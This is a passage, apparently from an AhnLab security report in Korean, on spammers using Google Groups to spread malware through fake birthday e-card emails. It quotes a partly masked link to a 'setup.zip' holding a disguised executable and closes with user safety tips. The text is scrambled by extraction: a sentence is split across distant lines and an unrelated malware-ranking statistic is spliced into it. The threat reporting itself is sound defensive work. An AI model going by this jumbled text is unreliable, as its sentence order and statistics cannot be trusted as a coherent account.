๋งŒ, ๊ฐœ์ธ ์‚ฌ์šฉ์ž์—๊ฒŒ๋Š” ์ถฉ๋ถ„ํžˆ ์‚ฌ์šฉํ• ๋งŒํ•œ ๊ฐ€์น˜๊ฐ€ ์žˆ๋Š” ์„œ๋น„์Šค๋“ค์ด ๋งŽ๋‹ค.

ํŠนํžˆ, ๊ตฌ๊ธ€์—์„œ ์ œ๊ณตํ•˜๋Š” ์„œ๋น„์Šค๋“ค์€ ํ˜์‹ ์ ์ด๋ฉฐ, ํŽธ๋ฆฌ์„ฑ์„ ๊ฐ•์กฐํ•œ ์„œ๋น„

์Šค๋“ค์ด ๋งŽ๋‹ค. ๊ทธ ์ค‘์—์„œ๋„ ๊ตฌ๊ธ€ ๊ทธ๋ฃน์Šค(Goolge Group)๋Š” ์ƒํ˜ธ ์ •๋ณด๋ฅผ ๊ต

ํ™˜ํ•˜๊ณ  ์‹ถ์€ ์‚ฌ๋žŒ๋“ค๊ฐ„์— ๊ฐ€์ƒ์˜ ๊ทธ๋ฃน์„ ๋งŒ๋“ค๊ณ  ๊ฒŒ์‹œํŒ์„ ํ†ตํ•ด ๊ณต์ง€์‚ฌํ•ญ,

ํŒŒ์ผ ๋“ฑ์„ ์†์‰ฝ๊ฒŒ ๊ทธ๋ฃน์›๋“ค์—๊ฒŒ ์ „ํŒŒํ•  ์ˆ˜ ์žˆ๋Š” ๊ตฌ๊ธ€ ํด๋ผ์šฐ๋“œ ์ปดํ“จํŒ… ์„œ

๋น„์Šค ์ค‘ ํ•˜๋‚˜์ด๋‹ค. ์ด๋Ÿฌํ•œ ํŽธ๋ฆฌํ•œ ์„œ๋น„์Šค๋ฅผ ์ŠคํŒจ๋จธ (Spammer)๋“ค์ด ์ŠคํŒธ

๋ฉ”์ผ์„ ํ†ตํ•œ ์•…์„ฑ์ฝ”๋“œ ์ „ํŒŒ ์‹œ์— ํ™œ์šฉํ•˜๋Š” ์‚ฌ๋ก€๊ฐ€ ๋ฐœ๊ฒฌ๋˜์–ด ์ด๋ฒˆ Volume

์„ ํ†ตํ•ด ๊ณต์œ ํ•˜๊ณ ์ž ํ•œ๋‹ค.

์ด๋ฒˆ์— ๋ฐœ๊ฒฌ๋œ ์ŠคํŒธ๋ฉ”์ผ์€ ๊ธฐ์กด ๋ฉ”์ผ๊ณผ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ, ์ผ์ƒ์ ์ธ ๋‚ด์šฉ์„ ๋‹ด

์•…์„ฑ์ฝ”๋“œ ๋ฐฐํฌ Top10์—์„œ Win-Adware/Shortcut.InlivePlayerAc-

tiveX.234 ๊ฐ€ 23,276๊ฑด์œผ๋กœ 1์œ„๋ฅผ ์ฐจ์ง€ํ•˜์˜€์œผ๋ฉฐ, Top10์— HTML/IF-

rame๋“ฑ 5๊ฑด์ด ์ƒˆ๋กœ ๋“ฑ์žฅํ•˜์˜€๋‹ค.

[๊ทธ๋ฆผ 3-6] ์ƒ์ผ e ์นด๋“œ๋กœ ๊ฐ€์žฅํ•œ ์ŠคํŒธ๋ฉ”์ผ

์ด๋ฒˆ ์ŠคํŒธ๋ฉ”์ผ์ด ๊ธฐ์กด ์ŠคํŒธ๋ฉ”์ผ๊ณผ ๋‹ค๋ฅธ ์ ์€ ๊ตฌ๊ธ€ ๊ทธ๋ฃน์Šค๋ฅผ ํ†ตํ•ด ์•…์„ฑ์ฝ”

๋“œ๋ฅผ ์ „ํŒŒํ•˜๋Š” ๊ฒƒ์ด๋‹ค. ์ŠคํŒธ๋ฉ”์ผ ๋ณธ๋ฌธ์—์„œ http://t****f.googlegroups.

com/web/setup.zipโ€๋ฅผ ํด๋ฆญํ•˜๋ฉด ๊ตฌ๊ธ€ ๊ทธ๋ฃน์Šค๋กœ ์ด๋™ํ•˜์—ฌ, ZipํŒŒ์ผ๋กœ

์••์ถ•๋œ ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œ ํ•  ์ˆ˜ ์žˆ๋‹ค. ์••์ถ• ํŒŒ์ผ์„ ํ’€๋ฉด ์•„๋ž˜์™€ ๊ฐ™์ด ์„ค์น˜

ํŒŒ์ผ์„ ๊ฐ€์žฅํ•œ ์‹คํ–‰ํŒŒ์ผ ์•„์ด์ฝ˜์ด ๋‚˜ํƒ€๋‚˜๋ฉฐ. ํ•ด๋‹น ํŒŒ์ผ์„ ์‹คํ–‰ํ•  ๊ฒฝ์šฐ ์•…

์„ฑ์ฝ”๋“œ๊ฐ€ ์„ค์น˜๋œ๋‹ค.

[๊ทธ๋ฆผ 3-7] ์•„์ด์ฝ˜์œผ๋กœ ๊ฐ€์žฅํ•œ ์•…์„ฑ์ฝ”๋“œ ํŒŒ์ผ

์ด๋ฒˆ Volume์—์„œ๋Š” ๊ตฌ๊ธ€ ๊ทธ๋ฃน์Šค์™€ ๊ฐ™์ด ํด๋ผ์šฐ๋“œ ์ปดํ“จํŒ… ์„œ๋น„์Šค๋“ค์„ ์ด

์šฉํ•˜์—ฌ, ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์ „ํŒŒํ•˜๋Š” ์‚ฌ๋ก€๋ฅผ ์‚ดํŽด๋ณด์•˜๋‹ค. ์•ž์œผ๋กœ ํด๋ผ์šฐ๋“œ ์ปดํ“จ

ํŒ… ์„œ๋น„์Šค์™€ ๊ฐ™์€ ํŽธ๋ฆฌํ•œ ๊ธฐ๋Šฅ๋“ค์ด ๊ณ„์† ๋ณดํŽธํ™”๋  ์ˆ˜๋ก, ํด๋ผ์šฐ๋“œ ์ปดํ“จํŒ…

์˜ ๊ฐ•๋ ฅํ•œ ์ธํ”„๋ผ๋ฅผ ์ด์šฉํ•œ ๋ณด์•ˆ ์œ„ํ˜‘์€ ์ฆ๊ฐ€ํ•  ๊ฒƒ์œผ๋กœ ๋ณด์ธ๋‹ค. ๋”ฐ๋ผ์„œ,

์‚ฌ์šฉ์ž๋“ค์€ ์•„๋ž˜ ๋‚ด์šฉ์„ ์ค€์ˆ˜ํ•˜์—ฌ ์ฆ๊ฐ€ํ•˜๋Š” ๋ณด์•ˆ์œ„ํ˜‘์œผ๋กœ๋ถ€ํ„ฐ ๋ณธ์ธ์˜ ์ปด

ํ“จํ„ฐ๋ฅผ ๋ณดํ˜ธํ•˜๊ธฐ ๋ฐ”๋ž€๋‹ค.

1. ๋ฐœ์‹ ์ธ์ด ๋ถˆ๋ถ„๋ช…ํ•œ ๋ฉ”์ผ์ผ ๊ฒฝ์šฐ ๊ฐ€๊ธ‰์  ๋ฉ”์ผ์„ ํ™•์ธํ•˜์ง€ ์•Š๋Š”๋‹ค.

2. ์•ˆํ‹ฐ๋ฐ”์ด๋Ÿฌ์Šค(๋ฐฑ์‹ ) ํ”„๋กœ๊ทธ๋žจ์„ ์„ค์น˜ํ•˜์—ฌ ํ•ญ์ƒ ์ตœ์‹  ์—”์ง„์„ ์œ ์ง€ํ•˜๋ฉฐ,

์‹ค์‹œ๊ฐ„ ๊ฐ์‹œ ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•œ๋‹ค.

3. ๋ฉ”์ผ ๋‚ด์— ํฌํ•จ๋œ ์ฒจ๋ถ€ํŒŒ์ผ์— ๋Œ€ํ•ด ์•ˆํ‹ฐ๋ฐ”์ด๋Ÿฌ์Šค(๋ฐฑ์‹ ) ํ”„๋กœ๊ทธ๋žจ์œผ๋กœ

๊ฒ€์‚ฌ๋ฅผ ํ•œ ํ›„ ์—ด๋žŒํ•œ๋‹ค.

4. ๋ฉ”์ผ ๋ณธ๋ฌธ์— ํฌํ•จ๋œ URL์€ ๊ฐ€๊ธ‰์  ์ ‘์†์„ ํ•˜์ง€ ์•Š๋Š”๋‹ค.

๊ณ  ์žˆ๋Š” ๋ฉ”์ผ์ด๋‹ค. ์ƒ์ผ e์นด๋“œ๋ฅผ ๊ฐ€์žฅํ•˜์—ฌ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์œ ํฌํ•˜๋Š” ์ŠคํŒธ๋ฉ”

์ผ๋กœ์„œ, [ํ‘œ1-7] ๊ณผ ๊ฐ™์€ ๋‚ด์šฉ์œผ๋กœ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋‹ค.

AhnLab SiteGuard Pro

Page 11: 01 - AhnLab, Inc
Page 12: 01 - AhnLab, Inc